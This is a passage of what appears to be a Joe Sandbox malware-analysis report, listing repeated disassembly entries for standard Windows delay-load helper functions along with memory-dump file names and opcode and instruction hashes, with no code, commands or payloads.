Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 968a14caf9bfbf6f0d59cf11979b5bcb1377961de6164dd85c92267f52922f23
Instruction ID: 5ec1a88ea0eed06b164bdb3b09b675e92ae44f45eb65f467b3847c03ce8a251e
Opcode Fuzzy Hash: 968a14caf9bfbf6f0d59cf11979b5bcb1377961de6164dd85c92267f52922f23
Instruction Fuzzy Hash: 65B0129626C1027C31087214AD82E3B03DCD4C3B1133080EBB149E01E1E4409C049731

Function 00B8D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9236aa5441c3243cce4a41c9932974a02d0f3d6466b64ae1cb568a7287c2510d
Instruction ID: 5874c497c68d80b87f2041871bac789e45f34dd7084e0e66dbe85089b97a3aa9
Opcode Fuzzy Hash: 9236aa5441c3243cce4a41c9932974a02d0f3d6466b64ae1cb568a7287c2510d
Instruction Fuzzy Hash: 2DB0129626C3017C31083210AD92D3B03DCC4C2B1133085FBB149F00F1E4409C48D531

Function 00B8D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 16b7b4dac8d7ca7c1e97d3966f2da27e3c38dc596a2aadf7e25c9ea5501e99f4
Instruction ID: e3142076eee7882487d857685b136a4d16e676c8f4e3caa56b2838b87e290c64
Opcode Fuzzy Hash: 16b7b4dac8d7ca7c1e97d3966f2da27e3c38dc596a2aadf7e25c9ea5501e99f4
Instruction Fuzzy Hash: DCB012A226C0037C310C7215EC42E3603DCC4C2B1033080EBB14DE01F1E4409C059631

Function 00B8D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a8a42fb32b5ef72f9da952a16aab327c220b47998c4c5b5e175f2ba844bca349
Instruction ID: 78d045cf9049065bea1aa694d566bed273ed709652cce1618261e4ab131b0451
Opcode Fuzzy Hash: a8a42fb32b5ef72f9da952a16aab327c220b47998c4c5b5e175f2ba844bca349
Instruction Fuzzy Hash: 58B012A226C0027C310C7214AD42E3603DCC4C2B1033080EBB14DE01F1E4409D069631

Function 00B8D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4746ccf146e97d3301acc49efda853349fb55169d278419c799e11fc2bc774b8
Instruction ID: 8de5ff693a55084104e81b243156f977db20a44932e090e5811cb5e03894d9bd
Opcode Fuzzy Hash: 4746ccf146e97d3301acc49efda853349fb55169d278419c799e11fc2bc774b8
Instruction Fuzzy Hash: F6B012A226C1027C31487214AC42E3603DCC4C2B1033081EBF14DE01F1E4409C459631

Function 00B8D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 311935c88e30daa8b7a76f0dad21a31326e0a912d16771dc834460ca8c7c2699
Instruction ID: 66841789e8f90272fb865d291bf6e55afa3a754f3b7d2fa6e10dfd8fd6a9c435
Opcode Fuzzy Hash: 311935c88e30daa8b7a76f0dad21a31326e0a912d16771dc834460ca8c7c2699
Instruction Fuzzy Hash: 7FB012A226C0027C31087214AC42E3603DCC4C3B10330C0EBB54DE01F1E4409C059631

Function 00B8D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 91801e5473ff8cfa7b969b861c43023442f483afa88666c508adda2d841f2990
Instruction ID: 8bac775e83c26bc4c0bef55e0f6d0a7060133a510e8388b917c119a3482a00fa
Opcode Fuzzy Hash: 91801e5473ff8cfa7b969b861c43023442f483afa88666c508adda2d841f2990
Instruction Fuzzy Hash: 6DB0129226C0017C310C7214AD42E3607ECC4C2B10330C0EBB149E02E1E4409C0E9631

Function 00B8D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 94e4f1c9e9f1aa11162137eaf964f473da635045e9872503d630735c49129c7f
Instruction ID: 26d51cbb6d2a6ec8b0dba12c4dec3a650066b45b5a2a89b6ff417e60224c42e5
Opcode Fuzzy Hash: 94e4f1c9e9f1aa11162137eaf964f473da635045e9872503d630735c49129c7f
Instruction Fuzzy Hash: F6B0129226C1417C31487214AC42E3607ECC4C2B10330C1EBB149E02E1E4409C899631

Function 00B8D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1f6000255fc6ae644b1fc5345863a088c66d9f2cd5a6d4286f085445507ac873
Instruction ID: 04190d2227e55ac42ff0cb8ae7c17802e36c9f344c5aa28b5ce5aa704a505d7b
Opcode Fuzzy Hash: 1f6000255fc6ae644b1fc5345863a088c66d9f2cd5a6d4286f085445507ac873
Instruction Fuzzy Hash: 30B0129226C0017C31087224AC43E3603DCC8C3B10330C0EBB649E01E1E5409C049631

Function 00B8D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 577dd1787e0db0f84754956127652666b9736185aea7aba9ba183b511e228bcb
Instruction ID: 8bf7090cdd6fd9e24ffbe96edd38e5639905a1ce4444d531f41b48fe0a7c1d02
Opcode Fuzzy Hash: 577dd1787e0db0f84754956127652666b9736185aea7aba9ba183b511e228bcb
Instruction Fuzzy Hash: B1B012A227D4027C31087214AC42E3603DDC8C2B1033080EBB149E01E1E4409C049631

Function 00B8D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1206c908bf19c38ae0f78ebc94f27cd2056eae1cab31e8368aa7352b9b34ca31
Instruction ID: 2ce514208fbb3ebb2e70021bbbba75cf1be213a8078d91afd6eb980fe768a4e6
Opcode Fuzzy Hash: 1206c908bf19c38ae0f78ebc94f27cd2056eae1cab31e8368aa7352b9b34ca31
Instruction Fuzzy Hash: 2EB012B226D5017C31487354AC42E3603DDC4C2B1033081EBB149E01E1E4409C449631

Function 00B8D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8717fb2740b104e0cd8bf39ced841c237c20b8b13ff71df8a43d8f0c62d5a7ea
Instruction ID: 1faf0a66207f17c24d612e9ab224a46198686649ec7816eab50ba242c406785e
Opcode Fuzzy Hash: 8717fb2740b104e0cd8bf39ced841c237c20b8b13ff71df8a43d8f0c62d5a7ea
Instruction Fuzzy Hash: 0AB012A226D4017C31087214AC42E3603DDC4C3B10330C0EBB549E01E1E4409C049631

Function 00B8D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8D8A3

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a38c7cc2d103d023056636185d9d65e40fc3c197d22162d5566cb1a46dc521b
Instruction ID: 52bd3d9d5eb949dbf667ca0c90d9b8841fd92f4583cff09cafa761483b5c9925
Opcode Fuzzy Hash: 6a38c7cc2d103d023056636185d9d65e40fc3c197d22162d5566cb1a46dc521b
Instruction Fuzzy Hash: EBB012A226C0017C310C7214AD43E3603DCC8C3B1033080EBB149E01E1E4409C059631

Function 00B8DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f7f3c2ea9ad06e11e2acfe21ede35f3a6e23987dc59a50ee483039b954af2d24
Instruction ID: 1061283883c3531db6292a8aaaa30c514745d183a16404357365c8d8ed391c52
Opcode Fuzzy Hash: f7f3c2ea9ad06e11e2acfe21ede35f3a6e23987dc59a50ee483039b954af2d24
Instruction Fuzzy Hash: 53B0129226C0016C310C73066C02E3E07DCC0C4B10330C5EBB209C01E9E4408C09D631

Function 00B8DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b48308181c6e4f2b1e74e4450f586c378cac8a17cd05f24e9e4328bcb0e939da
Instruction ID: a83c11cb8b784b88d6ae4f098e5749873bdc8dcbc06614f2a0d2dec8c005dcaf
Opcode Fuzzy Hash: b48308181c6e4f2b1e74e4450f586c378cac8a17cd05f24e9e4328bcb0e939da
Instruction Fuzzy Hash: B7B012A226C002AC320C73066C02D3A03DCC0C0B10330C1EBB509C01F5E4448C05D631

Function 00B8DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9cad15c225ae54a07c3481ced2dbbb8434895841bd019b3e769444e8e83601f3
Instruction ID: 6ae64e556e2d4e80a206ca4c57f52a82fc91b49607279858931bf4deeba00896
Opcode Fuzzy Hash: 9cad15c225ae54a07c3481ced2dbbb8434895841bd019b3e769444e8e83601f3
Instruction Fuzzy Hash: 72B012A636C0826C310C72042D07D3743ECC0C4B1033084DBB20AC01E1E9418C05D231

Function 00B8DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 512e7728f5dfb75944f46247c9d31316b5c62322ab6ddec9c5f86c50c3fd33e5
